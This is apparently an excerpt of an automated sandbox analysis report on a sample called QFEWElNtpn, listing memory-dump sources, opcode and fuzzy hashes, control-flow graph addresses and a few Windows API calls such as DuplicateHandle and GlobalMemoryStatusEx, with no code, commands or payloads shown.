                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3365184815.0000000006B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_6b90000_QFEWElNtpn.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3c70c5f8005cbbd16caafad7bd40b8995f04924573e3c6b0b1971418be7da9e3
                                                    • Instruction ID: 8ba302e86836299c4a668ac7f783be63b356facd933b9aa6c69f8037a6540e27
                                                    • Opcode Fuzzy Hash: 3c70c5f8005cbbd16caafad7bd40b8995f04924573e3c6b0b1971418be7da9e3
                                                    • Instruction Fuzzy Hash: 95F16DB1E00209CFEF65DFA9C844B9DBBF1FF48314F1481A9E405AB265DB74A945CBA0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3365184815.0000000006B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_6b90000_QFEWElNtpn.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $
                                                    • API String ID: 0-3993045852
                                                    • Opcode ID: defb29943abf9e12071de7d99ec8c3017042733d74a984b83c82c75992cd3db8
                                                    • Instruction ID: 9598478d7b2f8b23101ed7cbdb9e0c92fcf5086695aa56fa11a0e5254df28102
                                                    • Opcode Fuzzy Hash: defb29943abf9e12071de7d99ec8c3017042733d74a984b83c82c75992cd3db8
                                                    • Instruction Fuzzy Hash: 4222B271F012198FDF64DBA4C4806AEB7B6EF8A310F1088BAD456EB354DA35DC41CBA0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3360078202.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1860000_QFEWElNtpn.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: \V[n
                                                    • API String ID: 0-1005319620
                                                    • Opcode ID: 0270b5f52bec6d2b1e0c03c2960d7efab13fe36cbc81c3c1dfdc0fbc05b7dab1
                                                    • Instruction ID: e7225ab0c9f3dc2308772deb97e61fa7eb712522cea30c67677e98d90e8d8e30
                                                    • Opcode Fuzzy Hash: 0270b5f52bec6d2b1e0c03c2960d7efab13fe36cbc81c3c1dfdc0fbc05b7dab1
                                                    • Instruction Fuzzy Hash: EC917C70E00649DFDF14CFA9D981B9EBBF6BF88704F248129E405EB294EB749945CB81
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3365184815.0000000006B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_6b90000_QFEWElNtpn.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dadbc97b138aa85c9ffd51c727a1058cdb28dc6b39936f65746b8e2fe1815b89
                                                    • Instruction ID: 221066a9ce0032bdf391e4b2d6185cfd2c458dcdc69da0dfba29bf84c1d088d9
                                                    • Opcode Fuzzy Hash: dadbc97b138aa85c9ffd51c727a1058cdb28dc6b39936f65746b8e2fe1815b89
                                                    • Instruction Fuzzy Hash: AD628D70B002059FDF94EB68D5946ADB7F6EF89300F5885A9D406EB391EB35DC42CBA0
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3365184815.0000000006B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_6b90000_QFEWElNtpn.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b0a304f32f5193243b2d1aa9257a209a11f064654b70bbc854f820c823141363
                                                    • Instruction ID: 5ee4ac38ea7c5a0a55dcf8bc5468ea25918ad6951926a019b26ae3fead24e39c
                                                    • Opcode Fuzzy Hash: b0a304f32f5193243b2d1aa9257a209a11f064654b70bbc854f820c823141363
                                                    • Instruction Fuzzy Hash: F9427031E1071A8BCB54EB74C8546ADB3F6BFD9300F5096AAD40AA7350EF309D81CB91
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3365109706.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_6b50000_QFEWElNtpn.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 589fd68b51b5df4e1fb25aa499471c7cf501e5911e85da46cd0bb49a5d316e17
                                                    • Instruction ID: a9eed9f40100af6e435a93e4c5be4c74c58c867168e87b6b78ccbe4a2a3dd4e5
                                                    • Opcode Fuzzy Hash: 589fd68b51b5df4e1fb25aa499471c7cf501e5911e85da46cd0bb49a5d316e17
                                                    • Instruction Fuzzy Hash: 7E22EE70B111068FDB54DB78D494BAEB7F2EF89310F2584AAD806DB3A1DB31DD418B91
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3365184815.0000000006B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_6b90000_QFEWElNtpn.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e1373e8c30b8c9599b1ffd1a2b897c41c7a0b998991546f2658a2818916be8cd
                                                    • Instruction ID: c7bc0c8c5b33cba96a42aafa73e1968a0c56a4076d847bd18626a3cd12394582
                                                    • Opcode Fuzzy Hash: e1373e8c30b8c9599b1ffd1a2b897c41c7a0b998991546f2658a2818916be8cd
                                                    • Instruction Fuzzy Hash: 30D1D5B1B101148FDF949B69D4906AEB7F2FF8A310F2588BAD546DB391CA31DC41C7A1
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3365109706.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_6b50000_QFEWElNtpn.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3cf83f195fba13fca60b92f86d509ad657290dc860d930d5610746466dbba815
                                                    • Instruction ID: 867195737253392f2b28b7d1b011393ebc7834531296411b35d885d53bee4021
                                                    • Opcode Fuzzy Hash: 3cf83f195fba13fca60b92f86d509ad657290dc860d930d5610746466dbba815
                                                    • Instruction Fuzzy Hash: A5B1C2B0B052598FEB58AF7994542BE7BE7AFC8640F05846EE447D7388DE348C028791
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3360078202.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1860000_QFEWElNtpn.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 83f1e0b20aa24521be49f24b66222cfafba6b9900df03a3454bd31bd5dd6e2ac
                                                    • Instruction ID: 0c3e3f255bba9283a6ca5fe5c43c407cd9dcc21b2b35b88cdc52b4837fa1ca54
                                                    • Opcode Fuzzy Hash: 83f1e0b20aa24521be49f24b66222cfafba6b9900df03a3454bd31bd5dd6e2ac
                                                    • Instruction Fuzzy Hash: 0EB15B70E00209CFDB14CFA9C8957ADBBF6BF88754F148129E815EB294EB749945CB82

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1615 6b53db0-6b53dbb 1616 6b53de5-6b53e04 call 6b534f8 1615->1616 1617 6b53dbd-6b53de4 call 6b534ec 1615->1617 1623 6b53e06-6b53e09 1616->1623 1624 6b53e0a-6b53e69 1616->1624 1631 6b53e6f-6b53efc GlobalMemoryStatusEx 1624->1631 1632 6b53e6b-6b53e6e 1624->1632 1636 6b53f05-6b53f2d 1631->1636 1637 6b53efe-6b53f04 1631->1637 1637->1636
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3365109706.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_6b50000_QFEWElNtpn.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: add512457b0edf7c370be51708cd36dc44b66edcf731e0932065d1c5b42d5200
                                                    • Instruction ID: 69f3a0080755e2b19ac73e6c7d158a5bdb99d602e64110f7b261a06d5afad352
                                                    • Opcode Fuzzy Hash: add512457b0edf7c370be51708cd36dc44b66edcf731e0932065d1c5b42d5200
                                                    • Instruction Fuzzy Hash: DC41F372D043599FCB14DF69D8003EEBBF5AF89210F1685AAD804A7340EB749845CBE1

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1640 6b91080-6b910bc 1641 6b9116c-6b9118c 1640->1641 1642 6b910c2-6b910c7 1640->1642 1648 6b9118f-6b9119c 1641->1648 1643 6b910c9-6b91100 1642->1643 1644 6b9111a-6b91152 CallWindowProcW 1642->1644 1651 6b91109-6b91118 1643->1651 1652 6b91102-6b91108 1643->1652 1645 6b9115b-6b9116a 1644->1645 1646 6b91154-6b9115a 1644->1646 1645->1648 1646->1645 1651->1648 1652->1651
                                                    APIs
                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 06B91141
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3365184815.0000000006B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_6b90000_QFEWElNtpn.jbxd
                                                    Similarity
                                                    • API ID: CallProcWindow
                                                    • String ID:
                                                    • API String ID: 2714655100-0
                                                    • Opcode ID: 3e5e01615ab6388bf7b8d54b1cbc66c95dc12c6871f170c49d97858a70a0d81f
                                                    • Instruction ID: 82ebe961a65ed8b2e8d5a4b6e0234002388ff812388a9912ef8d8520bc758165
                                                    • Opcode Fuzzy Hash: 3e5e01615ab6388bf7b8d54b1cbc66c95dc12c6871f170c49d97858a70a0d81f
                                                    • Instruction Fuzzy Hash: 0E414BB490035ADFDB54CF49C848AAAFBF5FB89314F25C499D518AB321D335A841CFA0

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1654 186d5f8-186d694 DuplicateHandle 1655 186d696-186d69c 1654->1655 1656 186d69d-186d6ba 1654->1656 1655->1656
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0186D687
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3360078202.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1860000_QFEWElNtpn.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 78a3296d52016d79fbfb9db6736d22146544efa9373311c203ace50fec9a69a8
                                                    • Instruction ID: 3d722f38ee9c71f0a058bc5c231cd7bc6078abdc44fa21f544c623f030aa5ee7
                                                    • Opcode Fuzzy Hash: 78a3296d52016d79fbfb9db6736d22146544efa9373311c203ace50fec9a69a8
                                                    • Instruction Fuzzy Hash: E321E5B5900249DFDB10CFAAD484ADEBFF5EB48310F14841AE958A7350C3789954CF65

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1659 186d600-186d694 DuplicateHandle 1660 186d696-186d69c 1659->1660 1661 186d69d-186d6ba 1659->1661 1660->1661
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0186D687
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3360078202.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1860000_QFEWElNtpn.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 527cea7085271f68d88464d720398de05f4f0aba452442fee3ae2e6f68702489
                                                    • Instruction ID: 488c00505720e03c81f91326a259157f7568bdd7ec31602ac4149af7cf3a8f8d
                                                    • Opcode Fuzzy Hash: 527cea7085271f68d88464d720398de05f4f0aba452442fee3ae2e6f68702489
                                                    • Instruction Fuzzy Hash: 1121C4B5900249DFDB10CFAAD984ADEBBF8EB48310F14841AE958A7350D378A954CFA5

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1664 6b534f8-6b53efc GlobalMemoryStatusEx 1667 6b53f05-6b53f2d 1664->1667 1668 6b53efe-6b53f04 1664->1668 1668->1667
                                                    APIs
                                                    • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,06B53E02), ref: 06B53EEF
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3365109706.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_6b50000_QFEWElNtpn.jbxd
                                                    Similarity
                                                    • API ID: GlobalMemoryStatus
                                                    • String ID:
                                                    • API String ID: 1890195054-0
                                                    • Opcode ID: d72b2a9802465cf9c340390c3a7f79e545f607d9f499497638e1ff9695779d75
                                                    • Instruction ID: bafc6ef50adfe0ba046fb03b562e64fbe173438eb2a8b74c045cb62b63985155
                                                    • Opcode Fuzzy Hash: d72b2a9802465cf9c340390c3a7f79e545f607d9f499497638e1ff9695779d75
                                                    • Instruction Fuzzy Hash: 1611F2B1C046599BDB10DF9AC844BDEFBF4AB48220F11816AE918A7241E378A944CFA5

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1671 6b53e81-6b53ec6 1672 6b53ece-6b53efc GlobalMemoryStatusEx 1671->1672 1673 6b53f05-6b53f2d 1672->1673 1674 6b53efe-6b53f04 1672->1674 1674->1673
                                                    APIs
                                                    • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,06B53E02), ref: 06B53EEF
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3365109706.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_6b50000_QFEWElNtpn.jbxd
                                                    Similarity
                                                    • API ID: GlobalMemoryStatus
                                                    • String ID:
                                                    • API String ID: 1890195054-0
                                                    • Opcode ID: 51631e38367be299730dce527fa9083293f70fa3f355d8642216ba25f7c944ab
                                                    • Instruction ID: d8a207b057ee42378b0c4c1f0290e02e597e291bd944e3145821d040a9960794
                                                    • Opcode Fuzzy Hash: 51631e38367be299730dce527fa9083293f70fa3f355d8642216ba25f7c944ab
                                                    • Instruction Fuzzy Hash: 6E1103B1C0065A9BDB10CF9AC8457DEFBF4AF48610F11856AE818A7340D378A944CFA5
                                                    APIs
                                                    • OleInitialize.OLE32(00000000), ref: 06B949ED
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3365184815.0000000006B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_6b90000_QFEWElNtpn.jbxd
                                                    Similarity
                                                    • API ID: Initialize
                                                    • String ID:
                                                    • API String ID: 2538663250-0
                                                    • Opcode ID: 40bac9886dee2b5b19a65f09eab81de0c30b00bbc38104c0b2a63f267e98bca4
                                                    • Instruction ID: eef6b3657a3328ac6838c0d06c4ed6a196c27548eb853828c26458dc674c426f
                                                    • Opcode Fuzzy Hash: 40bac9886dee2b5b19a65f09eab81de0c30b00bbc38104c0b2a63f267e98bca4
                                                    • Instruction Fuzzy Hash: CE1145B5800349DFDB10DFAAD885BCEFBF8EB49310F108459E518A7250C378A544CFA5
                                                    APIs
                                                    • OleInitialize.OLE32(00000000), ref: 06B949ED
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3365184815.0000000006B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_6b90000_QFEWElNtpn.jbxd
                                                    Similarity
                                                    • API ID: Initialize
                                                    • String ID:
                                                    • API String ID: 2538663250-0
                                                    • Opcode ID: f3b623d0009817af7796b8152f741083d94adba5bcbd9d207664ebd0ec7dccdf
                                                    • Instruction ID: 083643af178ad642a8c0352ca728fb16f22780ea5d38ae1f048db922ed15ece3
                                                    • Opcode Fuzzy Hash: f3b623d0009817af7796b8152f741083d94adba5bcbd9d207664ebd0ec7dccdf
                                                    • Instruction Fuzzy Hash: 731133B5800348CFDB10DF9AD585B9EBBF4EB49310F108469D518A7200C378A944CFA5
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3359051379.00000000014CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014CD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_14cd000_QFEWElNtpn.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5e06bd8fba93c152587b54a4b2eadc35e3df9ab44fb33ce475fd7bf15e283ba2
                                                    • Instruction ID: aa8a7d0a1feb734c21f988d32c52a74221b6689d45c325a7de3c81d15b357ea2
                                                    • Opcode Fuzzy Hash: 5e06bd8fba93c152587b54a4b2eadc35e3df9ab44fb33ce475fd7bf15e283ba2
                                                    • Instruction Fuzzy Hash: 782125B9A04200EFDB55DF69D9C0B16BBA1FB84718F20C57ED90A0B366C336D447CAA1
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3359051379.00000000014CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014CD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_14cd000_QFEWElNtpn.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: eedc1c6f0f5a7935b97c098a8f3ce47bed0059b68f1e10828fe1390471d79088
                                                    • Instruction ID: 8116ee4b5c29fb2e4fadf97359e27f0318139162753a0a5110e7685593642ddf
                                                    • Opcode Fuzzy Hash: eedc1c6f0f5a7935b97c098a8f3ce47bed0059b68f1e10828fe1390471d79088
                                                    • Instruction Fuzzy Hash: D12183755093809FC712CF24D594716BF71EB46214F28C5EFD8498F667C33A980ACBA2
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3358996197.00000000014BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014BD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_14bd000_QFEWElNtpn.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6da3f460ce839d506c57961659506e64c7b86fee5bebba92a52fc3036e09b195
                                                    • Instruction ID: 328e233790d1d21e66acb4fcbf88a8013631c3eb9117386c1535e926f637c9b1
                                                    • Opcode Fuzzy Hash: 6da3f460ce839d506c57961659506e64c7b86fee5bebba92a52fc3036e09b195
                                                    • Instruction Fuzzy Hash: 3EF0C271405344AAE7108E0ADCC4BA3FFA8EB41628F18C45BED0C4F297C27A9844CAB1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3360078202.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1860000_QFEWElNtpn.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: \V[n
                                                    • API String ID: 0-1005319620
                                                    • Opcode ID: f61d1859f57db9eb4c118cc2367ed4f4b1bf4df38a7e09b1fe9cf8c40975c04a
                                                    • Instruction ID: 38cddc05a78b1db06c84c80bc177fcb23e39d7dd9b0c062b50a8df8507a38b49
                                                    • Opcode Fuzzy Hash: f61d1859f57db9eb4c118cc2367ed4f4b1bf4df38a7e09b1fe9cf8c40975c04a
                                                    • Instruction Fuzzy Hash: 0EB14D70E0021DCFEB14CFA9C88579EBBF6AF89714F148129E815EB254EB749945CB81